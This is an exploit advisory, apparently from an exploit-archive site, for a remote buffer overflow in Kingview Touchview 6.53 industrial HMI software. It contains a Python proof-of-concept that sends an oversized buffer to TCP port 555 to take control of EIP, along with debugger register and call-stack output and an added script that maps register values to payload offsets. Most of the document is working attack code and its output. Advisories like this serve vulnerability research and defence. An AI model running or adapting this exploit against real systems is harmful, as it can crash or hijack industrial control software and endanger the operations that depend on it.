Kingview Touchview 6.53 EIP Overwrite

2012.06.26
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Kingview Touchview EIP direct control
# Date: June 24 2012
# Exploit Author: Carlos Mario Penagos Hollmann
# Vendor Homepage: www.kingview.com
# Version: 6.53
# Tested on: Windows SP 1
# CVE :

Open Kingview, click on "Make", choose Network Configuration ---> Network Parameter, then go to the node type and choose "Local is a Login Server". Run the demo and port 555 will be open.

NOTE: This was already patched by the vendor silently.

    import os
    import socket
    import sys

    host = "10.0.2.15"
    port = 555

    # Filler regions followed by a 4-byte marker ("DCBA") that ends up in EIP
    exploit  = ("\x90" * 1024)
    exploit += ("A" * 23976)
    exploit += ("B" * 12500)
    exploit += ("D" * 6250)
    exploit += ("E" * 6002)
    exploit += ("\x44\x43\x42\x41")
    exploit += ("\x90" * 256)

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(exploit)
    data = s.recv(1024)
    print " [+] Closing connection.."
    s.close()
    print " [+] Done!"

Register state at the crash (debugger output):

    eax=7ffdf000 ebx=00000000 ecx=40000000 edx=00000008 esi=41424344 edi=0012f6b4
    eip=41424344 esp=0012f650 ebp=0012f678 iopl=0         nv up ei pl nz na po nc
    cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
    41424344 ??              ???

Call stack:

    0x41424344
    USER32!GetDC+0x6d
    USER32!EnumDisplaySettingsA+0x27d
    USER32!EnumDisplaySettingsA+0xc9
    USER32!DefDlgProcA+0x22
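To make the register dump above readable as crash triage, here is an added example (not part of the advisory): it rebuilds the sent byte string from the layout in the exploit, converts each register value from the dump into little-endian memory bytes, and locates the offset those bytes occupy, confirming that EIP and ESI were loaded from the "DCBA" marker at offset 49752 while the other registers hold values that did not come from the payload. The layout and register values are taken from the advisory; the function names are my own.

```python
import struct

# Payload layout exactly as in the advisory's exploit: (bytes, repeat count), in send order.
PAYLOAD_LAYOUT = [
    (b"\x90", 1024),
    (b"A", 23976),
    (b"B", 12500),
    (b"D", 6250),
    (b"E", 6002),
    (b"\x44\x43\x42\x41", 1),   # the "DCBA" marker
    (b"\x90", 256),
]

# Register values copied from the crash dump in the advisory.
CRASH_REGS = {
    "eax": 0x7FFDF000, "ebx": 0x00000000, "ecx": 0x40000000, "edx": 0x00000008,
    "esi": 0x41424344, "edi": 0x0012F6B4, "eip": 0x41424344,
    "esp": 0x0012F650, "ebp": 0x0012F678,
}

def build_payload(layout):
    """Concatenate the layout into the byte string that was sent to TCP/555."""
    return b"".join(chunk * count for chunk, count in layout)

def register_as_bytes(value):
    """x86 is little-endian: a register holding 0x41424344 was loaded from the
    bytes 44 43 42 41 in memory order, i.e. the ASCII text "DCBA"."""
    return struct.pack("<I", value)

def find_controlled_offset(payload, reg_value):
    """Offset in the payload from which a 32-bit register holding reg_value
    would have been loaded, or -1 if that value does not occur in the payload."""
    return payload.find(register_as_bytes(reg_value))

def region_for_offset(layout, offset):
    """Index of the layout entry covering the offset (-1 if out of range),
    so a hit can be named: entry 5 is the DCBA marker, entry 0 the leading NOPs."""
    start = 0
    for idx, (chunk, count) in enumerate(layout):
        end = start + len(chunk) * count
        if start <= offset < end:
            return idx
        start = end
    return -1

def triage(layout, regs):
    """Map each register to the payload offset it was taken from (-1 = not payload data)."""
    payload = build_payload(layout)
    return {name: find_controlled_offset(payload, value) for name, value in regs.items()}
```

Any register that resolves to an offset inside the marker entry is directly controlled by the sent data, which is what "EIP direct control" in the title means.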

References:

http://www.kingview.com


Copyright 2024, cxsecurity.com
